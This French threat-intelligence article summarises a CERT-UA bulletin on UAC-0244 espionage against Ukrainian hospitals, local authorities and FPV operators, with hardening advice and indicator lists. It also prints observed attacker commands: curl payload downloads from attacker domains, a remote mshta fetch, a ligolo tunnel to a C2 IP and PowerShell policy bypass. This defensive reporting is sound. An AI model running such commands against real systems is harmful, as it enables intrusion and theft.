CTI & OSINT

UAC-0244 (ex UAC-0247) : intensification des opérations contre les hôpitaux, les collectivités locales et les opérateurs FPV ukrainiens

by  • 

TLP:CLEAR
Source : CERT-UA Publication initiale : 15.04.2026 Mise à jour : 20.04.2026 Cluster : UAC-0247 fusionné dans UAC-0244 Catégorie : Espionnage / Accès initial

Synthèse. Le CERT-UA a publié une analyse consolidée d’une vague d’attaques observée entre mars et avril 2026 contre des organes de l’administration locale ukrainienne et, principalement, des établissements hospitaliers communaux, en particulier les hôpitaux cliniques et les hôpitaux d’urgence. Cette activité, initialement suivie sous l’identifiant UAC-0247, a été fusionnée avec le cluster UAC-0244 sur la base de preuves techniques convergentes. Les opérations exploitent des leurres d’aide humanitaire ou de procédures judiciaires pour déployer une chaîne d’infection LNK puis HTA puis EXE, conduisant au déploiement d’un implant .NET désigné AGINGFLY ainsi qu’à l’utilisation de RAVENSHELL, SILENTLOOP, CHROMELEVATOR, ZAPIXDESK, LIGOLO-NG, CHISEL, RUSTSCAN et XMRIG. Les opérateurs FPV des Forces de défense ukrainiennes sont également visés via une version troyennisée de l’application BACHU diffusée par Signal.

Mention. Le bulletin officiel de CERT-UA remercie nommément le chercheur M.F. et son équipe pour la qualité de la collaboration et l’échange continu d’informations sur ces menaces. Cet article reprend et synthétise en français l’analyse publique du CERT-UA, sans ajout d’interprétation au-delà des éléments techniques vérifiables.

1. Contexte et fusion des clusters

Le CERT-UA précise que l’activité décrite initialement comme cluster distinct UAC-0247 est en réalité conduite par les acteurs précédemment suivis sous l’identifiant UAC-0244. Le suivi unifié des campagnes associées s’effectue désormais sous le seul identifiant UAC-0244. Les indicateurs de compromission historiquement attribués à UAC-0244 sont conservés et ajoutés en annexe du bulletin.

2. Cibles observées

  • Établissements hospitaliers communaux, principalement hôpitaux cliniques et services d’urgence médicale.
  • Organes de l’administration locale en Ukraine.
  • Forces de défense ukrainiennes, en particulier les opérateurs FPV ciblés via une version compromise de l’application BACHU.

3. Vecteur initial

L’amorce de la chaîne d’attaque repose sur des échanges de courriers électroniques présentés comme une discussion préliminaire autour d’un projet d’aide humanitaire. Au cours de l’échange, l’attaquant invite la cible à consulter un lien. Pour renforcer la crédibilité de la légende, deux variantes sont observées :

  • Mise en place d’un site web fictif représentant une organisation humanitaire, dont le contenu peut être généré à l’aide d’outils d’IA.
  • Chargement d’un script tiers depuis un site légitime présentant une vulnérabilité de type XSS (Cross-Site Scripting).

Chaîne d’infection technique

Le clic sur le lien déclenche le téléchargement d’une archive contenant un fichier .lnk. Son ouverture provoque l’exécution de mshta.exe, qui récupère et exécute un fichier HTA distant. Ce HTA assure deux fonctions :

  • Affichage d’un formulaire leurre cohérent avec le prétexte humanitaire ou judiciaire.
  • Téléchargement d’un binaire EXE et création d’une scheduled task pour assurer la persistance et l’exécution récurrente.

L’EXE déployé réalise une injection de shellcode dans un processus légitime, par exemple RuntimeBroker.exe. Les campagnes les plus récentes utilisent un loader en deux étapes, dont la seconde s’appuie sur un format de fichier exécutable propriétaire (sections code et données, gestion des imports DLL et relocations) ; le payload final est compressé et chiffré. Les stagers observés incluent un TCP reverse shell standard ainsi qu’une variante interne classifiée RAVENSHELL.

4. Arsenal logiciel

AGINGFLY

Implant développé en C#, dédié au contrôle à distance des postes compromis. Fonctionnalités principales : exécution de commandes, transfert de fichiers, captures d’écran, keylogging et exécution de code arbitraire. La communication avec l’infrastructure C2 utilise des WebSockets, le trafic étant additionnellement chiffré en AES-CBC avec une clé statique. Particularité notable : les handlers de commandes ne sont pas implémentés en dur dans le binaire, mais téléchargés depuis le serveur de commande sous forme de code source puis compilés dynamiquement.

RAVENSHELL

Variante de TCP reverse shell établissant une connexion vers le serveur C2, avec chiffrement du trafic via une clé XOR de 9 octets 01 01 02 03 74 15 04 FF EE. Lors de la première connexion, le client envoie le message chiffré par XOR Connected!. L’exécution des commandes reçues s’appuie sur cmd.exe.

SILENTLOOP

Script PowerShell assurant la persistance, l’exécution de commandes, l’autoupdate de configuration et la résolution dynamique de l’adresse IP du C2. La source primaire d’adresse C2 est un canal Telegram, complétée par des mécanismes de fallback. SILENTLOOP est typiquement déployé en parallèle d’AGINGFLY pour assurer un foothold redondant.

CHROMELEVATOR

Outil dédié à l’extraction de credentials et de données de session depuis les navigateurs Chromium. Échantillons observés en versions x64 et arm64.

ZAPIXDESK

Composant ciblant le messager WhatsApp Desktop pour l’exfiltration de conversations et données associées. Implémenté sous forme de script PowerShell.

LIGOLO-NG, CHISEL, RUSTSCAN

Outils publics utilisés pour la découverte réseau, le scan de sous-réseaux et l’établissement de tunnels chiffrés permettant les mouvements latéraux. Des scanners maison plus rudimentaires ont également été observés en complément.

XMRIG via WIREGUARD patché

Dans un cas, un mineur XMRIG a été déployé sous forme de DLL chargée par un binaire WireGuard légitime modifié (DLL side-loading). Cette technique combine monétisation et détournement d’un binaire signé.

5. Opération contre les opérateurs FPV (BACHU)

Le 10.03.2026, un partenaire d’échange d’informations a signalé au CERT-UA la diffusion via Signal d’une prétendue mise à jour de l’application BACHU, destinée aux opérateurs de drones FPV des Forces de défense ukrainiennes. L’archive bachu.zip contenait un binaire principal et une bibliothèque DLL malveillante. Au lancement, la DLL était chargée par DLL side-loading et provoquait le déploiement d’AGINGFLY sur le poste de la victime. Cette opération illustre l’extension des cibles de UAC-0244 au domaine militaire opérationnel.

6. Réduction de la surface d’attaque

Le CERT-UA rappelle que la majorité des chaînes d’infection observées peut être neutralisée par des mesures durcies de configuration des postes Windows :

  • Restriction de l’exécution des fichiers .lnk, .hta et .js depuis les contextes utilisateurs (téléchargements, archives, répertoires temporaires).
  • Restriction de l’exécution des binaires LOLBins fréquemment abusés : mshta.exe, powershell.exe, wscript.exe.
  • Activation de Attack Surface Reduction (ASR) et application de règles de blocage des macros, scripts obfusqués et child processes lancés par Office.
  • Surveillance des créations de scheduled tasks pointant vers des chemins utilisateurs (%APPDATA%, %LOCALAPPDATA%, %PROGRAMDATA%).
  • Détection des connexions sortantes vers les domaines en .linkpc.net, .work.gd, .publicvm.com et autres services de DNS dynamique fréquemment instrumentés par UAC-0244.

7. Indicateurs de compromission – UAC-0247 (désormais UAC-0244)

7.1 Hashs de fichiers (MD5 / SHA-256 / nom)

MD5SHA-256Nom / Famille
9e545e8065cdaf4ee15ed501bda9191c57c6b2e25330b2385a0f3bcd8c7ae531b745a3e7e50657d7f78eaef7ad3d3f8dForma peredachi vidomostei.zip
8440fc8a282d98f36e04308eb04acddb7d6d58f91d13b21e54d8c72a5036cf80efd97f426f8983fb81d6e1ad7e8e8329Forma peredachi vidomostei do NAZK.lnk
f8058857fd936d4f3daff9e2d0c50a666f615f084d17ccd5fa075cf393525cbce0b25cda8f2ea70b416ab097e3994600form.hta
ce61a846a0b292b20404742ffb91445e22c96b2e5fb474ada47eab436692880848d3b84c8b78fc552c320d9d454c561fscript.js
47b35575794f602fd1584ef75dff55769406148ba138d4e212a9f9e961186635cd00193473a2f653ac129f98badcb9feOneDriveUpdater.exe (AGINGFLY) 2026-04-09
e7a0b364c94ab38a88ae9a942808acc1afa98fc6bfc336c00910177fb6af6c1c67ff92da295bf2c4d80884be6eceb678Povidomlennia 336-5187-26.zip
26626b3dd0d47ca67ca7c573b2d2acb2ab7d9b4b692ce6353441f483333df5b3ca7889bec3299803cf06c2877ab25439Povidomlennia 336-5187-26.txt.lnk
21975c94467458c4ebffe458c5eaec7198f3773888a2f5aa3730bdec08803fd31477d42b41cce2adc1f0e31b2340e5d6notification.hta
5493eec4cadbbd7c8d6668e12cf12f60bd2e0f7877ae0ab1a0938fb0f3e96c525eebc06c0a9cd1bc0df04302ce222b13script.js
c842e479a2350d848af64bb2cf04d595cf123bf5ccc036101b50bd2e20534afaa5edcbc348e05b7b59b55c5359b48709dopomoga.html
aa526a8d5c32aa9a5722575efbac8f8c8040da63a8f5be3fec9724d6d6e6f101f5336d99be309bf0b7cd781f12aace15Forma zaiavky UkrVarta.txt.zip
7b29ad0c8f4db5ed175f1076ceac75ab13a83e8becb91e7884400214cddd96f5890960992d263815193db3eb18814456Forma zaiavky UkrVarta.txt.lnk
6ae81a9b752ada83d451a2f75b19018cc4261acc2c1d4dbf84c3a9aad576eff0b0295b3a04ca4186ce41629eda18e52ddopomoga.hta.old
b8533f370e9e7377dd50b5af2095e2212f0b749486071d37e3669cbd87fce60d330af405027b4716c93e34efb3432938dopomoga.hta
7719b90aabc892354a7bd5ccf6ab3970ce4b6f15831b6461803eae431da88cfb45dda401cc9d4ac136d164afe65640e1script.js
3fa804f64a59117ad7f77013647105be0290f1c8ef7baf3330bd83ce1db197487421f6010244e54cbd08da70579c4c1eupdater.txt
44fe18a23d6d2ca53a7234a934f438dbc06cc6122b798f88a05a088bfed39594af86ba714da89fec5ca62d7119782df9updater.exe (injecteur)
8b2a9635f729c68cddedc00c70c8b4f2b1d765f50f5c53702658b7a59a9bd05cfb042ea6b2d150191a84c53d373b9e4aEncryptedReverseShell.exe (RAVENSHELL)
f2c06d95e95ca67a433778145e2d51c4bad3b1fbb4f98513fa4f5600c20253bd0a8cf77c723ecaaf5b9533873336a35bconference_agenda.rar
5e0070c50c82c6b30de51393a01988d839e90d5f6875a9e65629d25566dbc1dca21ce1846040dd56fc973cfdc2de2187Detalna informatsiia konferentsii.txt.lnk
608e2704a6d90f6c2712ae46cfcac6c8aae81ae7528f6515051e601705d498b349161f264e10b6d2ee364d36943aa06econference.hta
ec82e01548ee2d02a29ebc9676c932b9fb0daadd1a84f9fc6d228fcf37c10fad5bd9db68ed7b86ac9bd33c20e3766e7bform.html
38b8c8cf78050eabeab24b83b4e350d763d8bec7b8e0f5d597a6b4d2dea310943f9287c7740edc1da1c691036520ef5aHumanitarian aid form.7z
2a218860021a14b8f2766cb2dc99953eb0e04141bf6ef7f463a6dff6f3662e0614b7bf2b091aa1efc01e1d5a93e49956Humanitarian aid form.pif
83850c7c688f99ca241d39d7fb6779df847808a455b715918fb2640a49d311ebc695d7a31353127c86a759c634288b89Humanitarian aid form.xlsx
4cca317b3f810b24fb25212170af4461c5c9edac78de2e1114f5dc64da24b596a0cff0c351dcba8a18bcf56bccd20919form.zip
031f87dc90425661c47839aefbd535decdef6eeaa553228d8f2065e80ccf6f1e230e092f39de0918e78139ce57153bc7Forma pidtverdzhennia hosp veteraniv.txt.lnk
dc709e460dd74abc02e9f912c66f27ad0337fffa8df404a3e6b996548821c9e86c46cd7ae58140d107dda03e57502052hospital1.hta
0d3ad791985b179604fc5dba184a40e9fc4249a875e1111fedfa2cff24d1ade936fbe7a9a1a31ab42d35a347ff69971aOneDriveUpdater.exe (injecteur) 2026-02-27
e39bbb156fc64fc0e095b0f5edee2c11f527a04bf13d075d0159a3a64840a0b76762638e7e1f412ece201f830a640ef0EncryptedReverseShell.exe (RAVENSHELL)
d6b435d886d99ad4c8995c6eeabf16b31b64c30d9c2de9d589156892fbfb5740cee8d97581728763c488410e6c82ca30updater.exe (AGINGFLY)
74d98c81d7b9df7dbf480f99f3a461a697544105269e9fc39b5cf2b01f3bedae5901739eb6b7d3444546e86f1bfc884fone.exe (AGINGFLY)
fc00d35e951ce2fd154c13770ebabda0041e6b1e041b1048e91cf9b3dab24cc76fd95dba22f06a9039f1c392918cdf40two.exe (AGINGFLY)
5cf94d3db151a200ffd72a2b9bc17a7590f88aaed18e3c8855d7d925984c68aa3e8988a1c7ac347e24ce60918ac4a0c1one.exe (AGINGFLY)
6b38c1ee0495476455b6b4a1364a4f67f949ecbb9f59c35d11020dde4ff4cb6c4c5b7346f07fefc8637609024f51fd04ligolo.zip
ff0a0d47229a92d95139f1d6bd8ac6914b41f36f82db6da8767a0a1c2997c8242d80b2d10a8f1d28c252a9306ec152b5agent.exe (LIGOLO-NG)
36c4dd58b17ab8878bcf1dfa74dd68585805f886f41eef041103b2ac4fc7298c3545f8bd2e74e3e8bd4a9f40f72ec48earchive.zip
1d04536714bb22a3e909525a7dd627f0e857298fd2f8d1c7d48780769433f33e7b3ceaae5ea5a74c13ce8c10bcc7b690chromelevator_x64.exe (CHROMELEVATOR)
24909335a110650fbd9b5633b385553453ba5fd24bbf81d3a2fc53af19884b8ebb6344281891bdb78adb924a1f65b40bchromelevator_arm64.exe (CHROMELEVATOR)
4e679b35fc6e23403d369fc1e93ef2b9ed401886b771152687f6fc844e8c2c296705456e810a1ec5886c7065735f2951encryptor.exe
92c084578bfb149acbea41eabb0627fcf8381233e7e648bf6d618d8e3d898c7d7f31feb6fe79bf66e22a0494366b8c14Updater.exe (AGINGFLY)
32a68cacb96f3b2e67f4d2889094cb6f758948b06d9a4ae4bfa75b8dfbe007600ce98f26db544f24d5318659132c36d5OneDriveUpdater.exe 2026-03-03
70d05b70ab15f7818bf70c36829d5a267c77bd170ad19279ebec6d014ee5ea59da9267de0117e1f4a1ec50fc3934e91cOneDriveUpdater.exe (AGINGFLY)
9a6a7b12557d6a077cf410830c72f2da145064e57fa51c4da495d5e2560ccfeba9c4065c3519445804b2de0bc09854f3sqlite.zip
cc13fcfe2a7e78fcaa1963fb35aa43571b6507b600bf628bb87cef0c2acbbb9b8f1b286c59e0d6cdc6b2f1573446b2c8sqlite3_rsync.exe
fc85541f66d643c32e30fa8e1556351708913c9f30a013085037e49cc6aca80ac010417f6fb31a954eff9e5793939ff3sqlite3_analyzer.exe
58c6ab5142e5b6e8806a4142fd829e288984d6896aaa5cace9cf80d4c16205f2f7c0cc7349b0d1bf8dae4930db5f89d5sqldiff.exe
8cf7f95c1062800ce1bd2af2a2be789f2cfc0ad9bbebbfe8eee70edec9955dd43effe580c1d1975319c97d9285fb3fdasqlite3.exe
4abfbe1fe6d467a28ccc2697284c86e84a41901d0bd852206ddd72f4acbcdb9fba0abcc9917bd677180f9d43a9eff110OneDriveUpdater.exe (AGINGFLY)
d5662d329303312c17559b30db08dac4cd17006bd5fc6b0f009257291ba0602089d0da0554805654f69c5183112fdc73DCUpdater.exe (AGINGFLY)
6e1a03bfbdc178e4eefb04fc9de2446be26c16f3adccb3c9dd737068941d1de850939b80193c5156218079582f5a7685rustscan.zip
26f5f39e7e22ee43ad45b84da70b56a4273a1d95b66f9f4dd8a36669a7834c3648fd9871b75071249cb5b080a15050dfrustscan.exe (RUSTSCAN)
5c6399960807835e2328b8e51ec0fbb3b1bdaaa148c36236a71410fede2539417136d1152646c9fc5e2dac0f04216a68chisel.zip
63657b025709468b6b4120ae7bb2bffe5db5e7f655c4ee94411df8110d1b6d02bb15574ac199fa7a553ce6c3cb25bf03chisel.exe (CHISEL)
9bdb0c756eb6e4af9a58c0bdbb0099fbcb065e8ece7482cc625561c92c4e31ae3ec61a8259b0725a4f59b291154e6f0eMicrosoft Updater.exe (AGINGFLY)
ef01bdcaf083122cb302ed9a03a7e9d4d1675d835845b24b0835139cb8ed0f22a32426c87b1ef17031d905d405960942chrome.exe (CHROMELEVATOR)
9493ecceeb99406626c84de42cc046e45a1f37938a2462c036905e1d21f40831178000b45634d4ee0070883089576639Updater.exe (AGINGFLY)
ea5b6f3b9929a0379a8653624105d42f7df9324c7f74c6e2a5d55e3145882bb26cd1d516aebe41460e8f43c7be606d94OneDrive.exe
c59162c429b034fa2952b74d1bfdc73510a3cb196db7981b1e6ad64cef51b13270cf14e3f2dc688d6410c610307fb089koi.dll (AGINGFLY)
e4e9540383fa6a389bc8f5453033a69ac20726dccf1671bb21be3d513d75c2360f1b2ccb163630fd19ca3d1beaf271fdwireguard.exe (WIREGUARD patché)
4917232fe3fd7fcbe8ca9b5866e00281d3ca347bbe250e50048a8db08de253211f517939df579b07c53aee7f796b49a6dcsvc.dll (XMRIG)
1958a8d7b6cb83326b719e0587cd5d48108eddf0e17d449ef56ca78fe6a20aeed8458c85d90dfbc5a1f34012febc3f55amd.ps1 (SILENTLOOP, watchdog)
88d0009e357809bd1455eafd07dc04fffa78ef8340db28be02e1737c883e832d9babc0812f6ea4a59fded1f91fd7bb33amd.deobf.ps1
7204bb8bcc40b833fc3fac65d537e7252244469442edacc7d539ea999d8c89263619589b088f778f629a22ef7034d5e9amd.ps1 (SILENTLOOP)
c9715c012b512f373caf2da6c7280abc6e228f2fc1bc6d4bb9db024dfe2850e9bf35039cba8b73abc4be2dcd07f48ee4amd.deobf.ps1
d9ca565d07b7c99e1f9c7aaf59673ba2335561b2d40c02a1002c3da80793218474cdc8a53a5ce4c18ffb1cfb4a8a0b2camd.ps1 (SILENTLOOP)
494b29a98d846ed03e96b8691007ac2d6635e02be395748604877c57347bda9e008e44a72124684574e9176fd347e38famd.deobf.ps1
622b490d80943ab25e524ccef12783e35751574ecbce6611ae0e2accbdb1b2eaf09278fbb168f02ecc39c1471c756d70dfDgrr3.ps1 (SILENTLOOP)
d2b006d6f435560ab3698204a2742423301369b1e02c89b40f358f4a5f1213f1b0bfec8c9211e852fd0e23b874a1406cdfDgrr3.deobf.ps1
283ba6abfe5606dde0df31d38c533101accd691363141df03caf3fe086d3e7ae2f7308a2305975728328384f8888676bamd.ps1 (SILENTLOOP)
bb3e5ac80cfcff6d81644e624da79c4a2120457b22c124b5671eb985b0628e8c08e6c9a4356d74a87e2954730533daffamd.deobf.ps1
b3a43f01addd074cfc614f20ba1b120740b68d6f8e54f29c41a224adda2b1146b1e78db8ac71d7529dbf97ae0b65f74dOneDrive.exe (AGINGFLY)
3fa655df754bf0edd313f29be8606d27abdf14bdba262975882ae3d547da2f7ccdb9d181aa0b4bbc758d0f8ec5b8280bMicrosoftUpdater.exe (AGINGFLY)
324b95d5121d0c4363dff2f55f9a67e858d1c2edc57ed02e7cf932608f10686f44cc57432749b8894f29a8e7390c8297ZAPiXDESK.ps1 (ZAPIXDESK)
cbeb2dfe8488923179ac829e108634e5480ee91706901f0d190209131126194c8c62c1304a7aeca494d749875667cf60discover.ps1
d88ba3021657d4afb2e800ad672827075250736eff7f487f79bed1af01e94a57ebb728bd704702d02fcda688a5ba8982bachu.zip (BACHU troyennée)
b60ffad8f8f5f5e8d9ab2fbd2f15ea5b73c733f4e60a06f18635c259f067d9aff438ee177dc487b7dab884647c6f0dc9DEVOBJ.dll
b334b95d269f40d1fafb173bb46498312f8bb95837f68b34f30ae8a1e06342a4249d13db09188363e73e3f5190b85408AdobeUpdater.exe (AGINGFLY)
96b64318d8409b23572e4e5a2b4284c7984ab1e993c7a2f61598af9deadc0355e46ad1d9fbce9cfbe524dafb0cb95d82Forma.zip
d1bee5b108556db0c1943edd819a88f9a1a67fbceac6b3b840893e375da5c449d0dacb22b4a914c5ff9827d42c991758Forma.hta
70f0042ae4f3e1ea71dce10cc2da0aae6fb81529a2d0477ffc85abf1a5eaadb5cdec692a1c5f428c8d1296d6770efa9bOneDriveUpdater.exe (injecteur TCP reverse shell)
ee2050e3d594dc4f057963984a3c1e5f5b484577f1aeacde601ceb1a96f21e528eea2cdef67b6438ec99e8d0d7ed3cb7Forma.zip
5a2941330dbb405313f4d9f4c74a6a23db1776cc96cb89c3bb39314363ae8476fea3421877214f362005d1ed59574c10Forma.hta
882d69bd0159fe7d709f3d4b31f415da6964067a3a9aededc653691b80cd9d52db5581cf8159d0b2e30d0de40fd54126OneDriveUpdater.exe (injecteur TCP reverse shell)
93c72fe81131eec53a4b3cbc8534d4a9855aa94f872d6ccafea38020c03ca4dc609a505787190b0c0a12a445fa954bf4ROZPORIADZHENNIA.pdf
017ac66be86dcbd9f539ba91c0b04f5f94ac9db9a6bbf603b93cc58ca206dec9dc2f0addf937f7fb7399cb4c46b1a442Instruktsiia.pdf
c51769e943944b4334a31148a4d4e23f2ab7a035d78e7721feab67c4a60ae12106aef9c0e6acfa27b12d0ab2e8958da6Forma.zip
0487a1ca8bb854f2a28644849f645722d209b9e5c833f0ddbaa5664a69a9e7f2854f1491a855f8e249949d87e75e20b3Forma.hta
a2b1c0f45961a4fb58d6cab5de9ac4bc91003d2f9a091cbb125a05fdd323ac31038e36b556aef08f20d8c1df1d049593DocViewer.exe (injecteur TCP reverse shell)
2da0d5a00920753d3ecba2c514d21c3db6cf060db84324abe273ce4a6ef1cd9d1a013ddc5d23c0eef3b19ef51f3d484cInstruktsiia.pdf
be30b8d47b7485a7f59f414c60cf12c88a040a2955447462f1fda39334412a7072c9f02925f0b701c7ccb3c632f4dc4ddeclaration.zip
7626f997057a8db6ffd9e5c3cffa0cef814a3dd631e767354104b54b972af5766faa48f7e0514eda4369c15af60b7a27declaration.hta
720235db313502d636a69d8ec118a924d100feb93a9990b3990e72eb9128e3d909c2d58f2b95e70a00c503636dfcd1d3DocViewer.exe (injecteur TCP reverse shell)
09dbbada80f0198936d073fae9d1fdf9d5dd5ff3f7cdac526cff6dc8aa166e553665656a31ea331c8634dff60f52525eDocViewer.exe (injecteur TCP reverse shell)
26f94d2cb5e178db22a4ef364135e303083c160fe1c380f553fb3f112eebc83fbbe41728f718e64871669b9956b68c51proofs_dec.zip
ac48c0436ee191a4b2bbe6a19a4948ea0ddd730a9df4d71e1a4df6a1a6060348c50db08930763f87ddb55504db83d043proofs.txt.lnk
12898c851bb409ae06b2ff7a67b2a336f8c4434c3edbc6d2d47a73cc11df2fa23f1c652b6740c6770559b07dd2dbd58bupdater.exe
0c883112be08398d5bbc686a933ac6bcef73a528e37f30fd84d41763b7f62f972407ec5ad6754ed86576a3bebbc053a7demon.x64.dll (HAVOC)

7.2 Indicateurs hôte

%APPDATA%\Adobe\amd.ps1 %APPDATA%\Adobe\dfDgrr3.ps1 %APPDATA%\MicrosoftOneDrive\OneDrive.exe %APPDATA%\MicrosoftUpdater\MicrosoftUpdater.exe %APPDATA%\Microsoft\MS.exe %LOCALAPPDATA%\AMD\amd.ps1 %LOCALAPPDATA%\Adobe\Acrobat\DC\DCUpdater.exe %LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe %LOCALAPPDATA%\OneDrive\OneDrive.exe %LOCALAPPDATA%\WireGuard\dcsvc.dll %LOCALAPPDATA%\WireGuard\wireguard.exe %PROGRAMDATA%\AMD\amd.ps1 %PROGRAMDATA%\AMD\settings.ini %PROGRAMDATA%\AMD\updater.exe %PROGRAMDATA%\Adobe\DCUpdater.exe %PROGRAMDATA%\Asus\ZAPiXDESK-main\ZAPiXDESK.ps1 %PROGRAMDATA%\MicrosoftUpdater\MicrosoftUpdater.exe %PROGRAMDATA%\Microsoft\Windows\chromelevator_x64.exe %PROGRAMDATA%\OneDrive\MSOneDrive.exe %PROGRAMDATA%\OneDrive\OneDrive.exe %SYSTEMROOT%\Updater.exe %TMP%\one.exe %TMP%\two.exe %LOCALAPPDATA%\Adobe\AdobeUpdater.exe %LOCALAPPDATA%\Adobe\settings.ini %LOCALAPPDATA%\DocViewer\DocViewer.exe %USERPROFILE%\AppData\Local\DocDownloader\updater.exe %USERPROFILE%\Documents\license_ua.txt

7.3 Commandes et scheduled tasks observées

schtasks /Create /SC MINUTE /MO 10 /TN "Adobe Acrobat Updater" /TR "%LOCALAPPDATA%\Adobe\AdobeUpdater.exe" /F
cmd /c cd /d %PROGRAMDATA%\Microsoft\Windows\ && conhost --headless %PROGRAMDATA%\Microsoft\Windows\chromelevator_x64.exe
cmd /c curl hXXps://ukrvarta.online/court/updater.txt -o %LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe
cmd /c curl hXXps://ukrvarta.online/dopomoga/updater.txt -o %LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe
cmd /c schtasks /create /tn "OneDrive Updater" /tr "%LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe" /sc MINUTE /mo 10 /ru "%USERNAME%"
conhost --headless %PROGRAMDATA%\Adobe\ligolo.exe -connect 109.237.97.43:11601 -ignore-cert
conhost --headless powershell -ep bypass -f %PROGRAMDATA%\AMD\amd.ps1
conhost.exe --headless %PROGRAMDATA%\Microsoft\Windows\agent.exe -connect 109.237.97.43:11601 -ignore-cert
mshta.exe hXXps://ukrvarta.online/court/notification.hta
cmd /c curl hXXps://nazk.linkpc.net/nazk/updater.txt -o %LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe
cmd /c curl hXXps://dsszzi.linkpc.net/OneDriveUpdater.exe -o %LOCALAPPDATA%\OneDriveUpdater\OneDriveUpdater.exe
cmd /c curl hXXps://edbo.work.gd/DocViewer.exe -o %LOCALAPPDATA%\DocViewer\DocViewer.exe
cmd.exe /c curl hXXps://declaration.linkpc.net/DocViewer.exe -o %LOCALAPPDATA%\DocViewer\DocViewer.exe

Scheduled tasks récurrentes : AMD Updater, AMD checker, AMD-DispUpdate, OneDrive Updater, OneDriveUpdater, microsoft running, Adobe Acrobat Updater, DocViewer, LzUpdater, Microsoft System Health Service, Scheduled Update.

Artefacts LNK :

  • MachineID : desktop-pmqujnk, desktop-f3fq5qo
  • DriveSerialNumber : 1497-1227, 7C83-E6CD

Chemins PDB observés :

  • C:\Users\Dan\Desktop\work\sqlite\bld\sqlite_bld_dir\2\sqlite3sh.pdb
  • C:\Users\user\source\repos\EncryptedReverseShell\x64\Release\EncryptedReverseShell.pdb

7.4 Indicateurs réseau

Adresses email : nazk.kharkiv@ukr.net canc.court@outlook.com Domaines : nazk.linkpc.net ukrvarta.online ukrdopomoga.space he335f2d353d.publicvm.com frontforce.org paste.c-net.org dsszzi.linkpc.net edbo.work.gd buttrocket.work.gd declaration.linkpc.net vizcpalsuvnbhjltpnrxcc5fo7lw95uy7.oast.fun Adresses IP : 2.27.19.81 5.104.75.193 63.250.43.96 77.239.98.97 89.22.234.92 89.125.189.118 91.108.248.20 91.108.248.95 91.108.249.60 91.108.249.106 91.149.221.9 91.149.253.100 109.237.97.4 109.237.97.43 138.124.228.103 138.124.229.250 159.255.38.19 193.124.56.218 194.87.108.110 URLs : hXXps://nazk.linkpc.net/nazk/form.hta hXXps://nazk.linkpc.net/nazk/request.html?id=937259-26 hXXps://nazk.linkpc.net/nazk/script.js hXXps://nazk.linkpc.net/nazk/updater.txt hXXps://ukrvarta.online/conference/conference.hta hXXps://ukrvarta.online/conference/updater.txt hXXps://ukrvarta.online/court/first.js hXXps://ukrvarta.online/court/notification.hta hXXps://ukrvarta.online/court/script.js hXXps://ukrvarta.online/court/updater.txt hXXps://ukrvarta.online/dopomoga/dopomoga.hta hXXps://ukrvarta.online/dopomoga/dopomoga.html hXXps://ukrvarta.online/dopomoga/form.html hXXps://ukrvarta.online/dopomoga/script.js hXXps://ukrvarta.online/dopomoga/updater.txt hXXps://ukrvarta.online/hospital/form.zip hXXps://ukrvarta.online/hospital/hospital.hta hXXps://dsszzi.linkpc.net/OneDriveUpdater.exe hXXps://edbo.work.gd/Forma.zip hXXps://edbo.work.gd/DocViewer.exe hXXps://declaration.linkpc.net/DocViewer.exe hXXps://declaration.linkpc.net/declaration.zip hXXps://buttrocket.work.gd/nld/license_ua.txt hXXps://buttrocket.work.gd/nld/updater hXXps://frontforce.org/ hXXps://pastebin.com/zpdvMVAJ hXXps://t.me/psyberia_alpinequest hXXps://t.me/sdgsersergser hXXps://paste.c-net.org/HobsonTarnish C2 WebSocket : (wss)://77.239.98.97/ws/agent/<RANDOM_GUID> (wss)://he335f2d353d.publicvm.com/ws/agent/<RANDOM_GUID> (wss)://ukrdopomoga.space/ws/agent/<RANDOM_GUID> (wss)://109.237.97.43/ws/agent/<RANDOM_GUID> C2 TCP : (tcp)://2.27.19.81:8443 (tcp)://109.237.97.43:11601 (tcp)://109.237.97.4:8443 (tcp)://138.124.228.103:8443 (tcp)://159.255.38.19:443 (tcp)://91.108.248.95:8443 (tcp)://91.108.249.60:8443 (tcp)://89.22.234.92:8443 (tcp)://91.108.248.20:8443 API HTTP (panneau de commande) : hXXp://91.149.221.9:8000/api/register hXXp://91.149.221.9:8000/api/commands hXXp://91.149.221.9:8000/api/result hXXp://91.149.221.9:8000/api/status hXXp://91.149.221.9:8000/api/client/<CLIENT_ID>/state hXXp://91.149.221.9:8000/api/file/client.ps1 hXXp://194.87.108.110:8000/api/register hXXp://194.87.108.110:8000/api/commands hXXp://194.87.108.110:8000/api/result hXXp://194.87.108.110:8000/api/status hXXp://194.87.108.110:8000/api/client/<CLIENT_ID>/state

8. Indicateurs historiques associés à UAC-0244

Les indicateurs ci-dessous, antérieurs à la fusion des deux clusters, restent attribués à UAC-0244 et sont publiés à titre de référence pour la consolidation des règles de détection.

8.1 Hashs (extrait)

MD5SHA-256Nom / Famille
beed4dc51f27c396ad47d35f52ec62eb687629ca9dc5b9b4bdf6c06fb1405449638b905f3a0c08bccac1c519ef22964dPropozytsiia po vprovadzhenniu.zip
50a1d8649ba3e48d051801c45249cc438a7401444dd7c85b36ff7b1d0b36c5953692ef32dbeac7642fb7c1034bd8a726Propozytsiia po vprovadzhenniu lyst.pdf.js
9d3dc10ecafbd7d4905a6ec773a7b1e483831b93f7c865455b09c08ad1aabc6d7d687739d5e54a7eb4fcc7fae8d5974cmaintenance
fdb86ba6ec523e19f6f932b93f956f3f78773eb9738bc3306a56bf39adc8212226479c24af8bf453be9d57103a91a904materialy_konferentsii.zip
bc94232f50e19965cb3f1bc1fc5e8f9d476334f9254ef0277b3462b6086655f38358a983b95991cfe4dcdd787740906amaterialy konferentsii_pdf.exe (PYINSTALLER)
2442907cefabdd1ac62a9b7341f00ada11383652b25725ea5cf7ac897d3f18d83d6f4b193d62de7429b6af98026a6d1bcaptcha.enc.txt
c5f212340db141e4decbb52bf8e983a5ff012aeac3cfe1c5147860db7c4a6369a7bd3f248c2604558b1fd6f4f868706dcaptcha_decoded.ps1
56199bd9e2e232ef4a4f24f4dba02ea937c842bcb38ec485db06ffd61038a7cdfcb5215d89bc794298c31d8c5fbb67b9SystemHealthSvc.ps1
2b0c228f01fd77c10b162ac751939c7d9c5ef112c40d2a3a44c5a54430fd7823e13ba6c6c9fb763caa2e363fe9af40f8Configurate.ps1
